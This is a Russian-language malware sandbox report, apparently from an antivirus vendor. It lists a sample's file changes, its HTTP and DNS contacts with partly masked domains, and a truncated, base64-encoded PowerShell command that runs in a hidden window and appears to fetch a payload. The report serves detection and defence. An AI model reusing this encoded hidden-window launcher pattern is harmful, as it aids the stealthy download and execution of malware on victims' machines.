Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEcAVABUAEIAYQBkAGcAPQAnAFUAWABTAFEAQQByAHUAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAYABSAGkAVAB5AFAAUgBgAE8AVABvAGMAbwBMACIAIAA9AC...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\940.exe
Удаляет следующие файлы
- %HOMEPATH%\940.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://no###khi.com/cgi-bin/3_69_x/
- http://ni####wlmusic.net/news=year/8s9a4_rd_bgq/
- http://ns#.org.uk/plesk-stat/auai_ow6_n1w7n7/
UDP
- DNS ASK no###ideas.com
- DNS ASK na######boilermaking.com.au
- DNS ASK no###khi.com
- DNS ASK ni####wlmusic.net
- DNS ASK ns#.org.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEcAVABUAEIAYQBkAGcAPQAnAFUAWABTAFEAQQByAHUAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBgAFUAYABSAGkAVAB5AFAAUgBgAE8AVABvAGMAbwBMACIAIAA9AC...' (со скрытым окном)
